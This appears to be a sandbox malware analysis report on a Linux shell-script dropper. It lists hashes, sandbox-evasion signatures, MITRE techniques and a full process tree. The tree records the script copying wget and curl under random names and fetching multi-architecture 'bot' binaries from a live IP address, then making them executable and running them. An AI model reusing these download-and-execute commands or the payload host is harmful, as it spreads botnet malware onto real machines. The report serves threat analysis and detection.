feeddd009cd653c590e099669ad46c1e472e4b008c34f15a14b2da29c4ba3f21

Analysis

max time kernel
42s
max time network
45s
platform
debian-9_armhf
resource
debian9-armhf-20240226-en
resource tags

arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
15/03/2024, 01:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh
Size

4KB
MD5

2bb334f185184c2073fef6318c9da1f1
SHA1

19118dda8b138600808af3458388b7d1abc2c46d
SHA256

d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41
SHA512

9c776ee57a44ad30c35998ad945efefdda56951c6ed9e8214635e92be1acb2b4690520806a606636958d50374038eaef4debfc08f98dd24bc3f653a96b94c50e
SSDEEP

24:af9+Jtd/FfwBJ4A/FffBKJ//FfEdJt/FfOnJJ/FfijJPd/FflqSgJV5/Ff1GJAG4:FrkDK4OilMSgY2zinTrcMcLsBal

Score

7^/10

antivm

Malware Config

Signatures

Executes dropped EXE 25 IoCs

ioc	pid	Process
/tmp/sfdhesrfyhdjh	663	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	689	sfghfsdhdfhysdgs
/tmp/RUN	692	RUN
/tmp/sfdhesrfyhdjh	695	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	712	sfghfsdhdfhysdgs
/tmp/RUN	722	RUN
/tmp/sfdhesrfyhdjh	727	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	746	sfghfsdhdfhysdgs
/tmp/RUN	759	RUN
/tmp/sfdhesrfyhdjh	762	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	770	sfghfsdhdfhysdgs
/tmp/RUN	780	RUN
/tmp/sfdhesrfyhdjh	785	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	802	sfghfsdhdfhysdgs
/tmp/RUN	809	RUN
/tmp/sfdhesrfyhdjh	812	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	819	sfghfsdhdfhysdgs
/tmp/RUN	824	RUN
/tmp/sfdhesrfyhdjh	827	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	831	sfghfsdhdfhysdgs
/tmp/RUN	834	RUN
/tmp/sfdhesrfyhdjh	837	sfdhesrfyhdjh
/tmp/sfghfsdhdfhysdgs	841	sfghfsdhdfhysdgs
/tmp/RUN	844	RUN
/tmp/sfdhesrfyhdjh	847	sfdhesrfyhdjh

Checks CPU configuration 1 TTPs 8 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs
File opened for reading	/proc/cpuinfo	sfghfsdhdfhysdgs

Reads runtime system information 33 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs
File opened for reading	/proc/sys/crypto/fips_enabled	sfghfsdhdfhysdgs
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/auxv	sfghfsdhdfhysdgs

Writes file to tmp directory 26 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/bot.mpsl	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.i468	sfghfsdhdfhysdgs
File opened for modification	/tmp/bot.i686	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.mips	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.arc	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.x86	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.arm	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/RUN	Process not Found
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/bot.x86_64	sfghfsdhdfhysdgs
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfdhesrfyhdjh	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp
File opened for modification	/tmp/sfghfsdhdfhysdgs	cp

/tmp/d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh
/tmp/d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh
1⤵
PID:654
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:659
- /bin/chmod
  chmod +x d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh sfdhesrfyhdjh systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:661
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.x86
  2⤵
  - Executes dropped EXE
  PID:663
- /usr/bin/wget
  wget http://103.172.79.74/bot.x86
  2⤵
  PID:679
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:687
- /bin/chmod
  chmod +x d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:688
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.x86
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:689
- /bin/cat
  cat bot.x86
  2⤵
  PID:690
- /bin/chmod
  chmod +x bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:691
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:692
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:693
- /bin/chmod
  chmod +x bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:694
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.mips
  2⤵
  - Executes dropped EXE
  PID:695
- /usr/bin/wget
  wget http://103.172.79.74/bot.mips
  2⤵
  PID:702
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:709
- /bin/chmod
  chmod +x bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:711
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.mips
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:712
- /bin/cat
  cat bot.mips
  2⤵
  PID:720
- /bin/chmod
  chmod +x bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:721
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:722
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:724
- /bin/chmod
  chmod +x bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:726
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arc
  2⤵
  - Executes dropped EXE
  PID:727
- /usr/bin/wget
  wget http://103.172.79.74/bot.arc
  2⤵
  PID:734
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod +x bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:744
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arc
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/cat
  cat bot.arc
  2⤵
  PID:757
- /bin/chmod
  chmod +x bot.arc bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:758
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:759
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:760
- /bin/chmod
  chmod +x bot.arc bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:761
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.i468
  2⤵
  - Executes dropped EXE
  PID:762
- /usr/bin/wget
  wget http://103.172.79.74/bot.i468
  2⤵
  PID:763
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:768
- /bin/chmod
  chmod +x bot.arc bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:769
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.i468
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:770
- /bin/cat
  cat bot.i468
  2⤵
  PID:777
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:779
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:780
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:781
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:784
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.i686
  2⤵
  - Executes dropped EXE
  PID:785
- /usr/bin/wget
  wget http://103.172.79.74/bot.i686
  2⤵
  PID:792
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:799
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:801
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.i686
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:802
- /bin/cat
  cat bot.i686
  2⤵
  PID:807
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:808
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:809
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:810
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs systemd-private-224f1967f2b049eebebb22e6b1a59297-systemd-timedated.service-3akpia
  2⤵
  PID:811
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.x86_64
  2⤵
  - Executes dropped EXE
  PID:812
- /usr/bin/wget
  wget http://103.172.79.74/bot.x86_64
  2⤵
  PID:816
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:818
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.x86_64
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:819
- /bin/cat
  cat bot.x86_64
  2⤵
  PID:821
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:823
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:825
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:826
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.mpsl
  2⤵
  - Executes dropped EXE
  PID:827
- /usr/bin/wget
  wget http://103.172.79.74/bot.mpsl
  2⤵
  PID:828
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:829
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:830
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.mpsl
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:831
- /bin/cat
  cat bot.mpsl
  2⤵
  PID:832
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:833
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:834
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:835
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:836
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arm
  2⤵
  - Executes dropped EXE
  PID:837
- /usr/bin/wget
  wget http://103.172.79.74/bot.arm
  2⤵
  PID:838
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:839
- /bin/chmod
  chmod +x bot.arc bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:840
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.arm
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:841
- /bin/cat
  cat bot.arm
  2⤵
  PID:842
- /bin/chmod
  chmod +x bot.arc bot.arm bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:843
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:844
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:845
- /bin/chmod
  chmod +x bot.arc bot.arm bot.i468 bot.i686 bot.mips bot.mpsl bot.x86 bot.x86_64 d8c053b3e8a84ff6070573653b70e7a7e65d51e4e6984e262465895904e4ee41.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:846
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.arm5
  2⤵
  - Executes dropped EXE
  PID:847

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/RUN

Filesize
205B

MD5
590bb4d773eeb9fe6b927ba68ee5a235

SHA1
117bd0b37e57701ddc2b0377c52c07128702b3f7

SHA256
c32518cf32b76b5a5f856bbedc865ef6097a68a062f0541e0aa8ef0d2a7d00fd

SHA512
81b8b966a0aa5948f0ad2f72675168fe4758d83bf376460fbb22b0a5a416c96f036d78b06971873a4b50b3c791f177f2109639e984058b19c296b04158571615

Download Submit
/tmp/RUN

Filesize
206B

MD5
d0ca9e115c1baec0d0acf3c54fe35801

SHA1
077a818982f7eb506ed5fd27d1781c8c06aad7da

SHA256
2b735aaedc7bdc26b15bf0ab29abb51950fafeb0f7dc66d365b87e342b238cee

SHA512
2afd512a9e9d40206742bbdcd41633092c3516a8a189ecbaa2aa86d7c65d856fb7199e2ddec817eda6dfdb0079a24460868cca8c4a623117146764044ddb37b4

Download Submit
/tmp/RUN

Filesize
206B

MD5
cdcdeda46b327ca4018ea7158c1cc94c

SHA1
64f254bfb172acacd6c938fe6cc868ca49bbac99

SHA256
bf272757812571347802a0ca8c5be9cea260b47164fe23afd5a7d9c041222048

SHA512
8819dfdfc4a39552d69333081de8081065c34d1c398df28f79612e05a0f117d67cab941fe355a184193f651f4ae38ec63a4153b213ad5e8e288997dcb7def59a

Download Submit
/tmp/RUN

Filesize
208B

MD5
781012617b8877ebc3941d643e570d49

SHA1
3c53c4f693e5df49ba3e6b494c9138bb16b3d888

SHA256
e4437e7139f70f5eed21f434046795f3dd767e946210da9271f47ed4bf5a1b70

SHA512
371f65ae3201dd5105ccd5bbb38b42069496deeabdb88af8706c5edcc41749e17fcf784709bb5f10875d6161eb9e3ff71d775c60ae3d43a770135444fdd0796c

Download Submit
/tmp/RUN

Filesize
206B

MD5
f30c73f9f4ca8088ebad02d86d34c47c

SHA1
569103dc4440e43d33c1ddaba4eb15720e223581

SHA256
b88a4c5dfb4aa38e97940f66bf4ed8361f0e782d362a0de607e3b5a34185da0d

SHA512
1a6122ca47987672afa47afd9c05eba4a0d70f16b8188d782fef015edeba5fc59c086278a7012ccd8a29b34d4851c711635bdb2ede52583d80ca60b891978a4d

Download Submit
/tmp/RUN

Filesize
205B

MD5
c60b2fde40680ec9d0b4ff52b0d3cff6

SHA1
87d43ee3528f0f13b056ddbe897c41b89b3be5d3

SHA256
032fe0a70c7674f82eb5a875a0ff805c074c3ad339df2b36a50097672f9c68ee

SHA512
ba83607801b239ad15cd7c2b7048c3367f3f7e4bc55ad8fbf2db961b5adcc344be0cfe295aa4211c35f113f24728cefc799b3988e670e7f802e989993d0594f1

Download Submit
/tmp/RUN

Filesize
206B

MD5
6be0aa51ad40671c359fc624d3db983b

SHA1
fbf6d609c1b591d981ebb1f27f90a2b60ab907e5

SHA256
a7d57138d8721255a0cfc0f546816a8c803b5c92765f1b310e1f04de1fe7a990

SHA512
ded37cef1a19c1229faac71354e745b095e989f3b311fa35befabcbf251e5d0644290a5a6ef2b5fa6d5bed886165b3a85de1ed8cb27ffa10af53537312c4a164

Download Submit
/tmp/bot.x86

Filesize
205B

MD5
c31a83e5f400a2118ddd35f0fecd77c8

SHA1
aca5c3a67cd4d67356449e03191e33c18eef11f7

SHA256
5fd72692f2c19340a6d339c2d06bca366fbada99e7b6e862644d416f0e20c725

SHA512
ddab1a51f1c5b89415a37cef1adb6b88a8b562f65e549e57af1d89f256a10c1565191a47ca2d1bbedb79b3c62c54219d3356e69f7a0ea27aa8720bd26d996091

Download Submit
/tmp/sfdhesrfyhdjh

Filesize
350KB

MD5
26392b160bd9b6d9bf3c0facd3867923

SHA1
5033b8205423a646870b764431f1e4d6149f8e6b

SHA256
9dbe55f22b2388874cf78164c1ed0794d402b5b457904b3e0319430abe3cf532

SHA512
edf7b4d968dbe930d9cd892edf3a0295751298144c5828af15a32a566e4f8d5515f899a620997eab81868de81fb502767e0e0ab83e1c612d1f84c1463bfdbe00

Download Submit
/tmp/sfghfsdhdfhysdgs

Filesize
149KB

MD5
20b40ccbb1ebd15d8c136f9852b3237d

SHA1
1e71f64883c6f097e4384bd7a95f42f1b231a19a

SHA256
db8109f973860b011ac6fdc46c86043bdcec2ceeacf7ac561b2bffb788cb36ae

SHA512
6b11db766e680df0b7be91997f663958198c22e24952a851c3014317eaf5b711738f2c9cf9691398259deb186c953b1c46106922b9bca0b70452d33bd8b90053

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads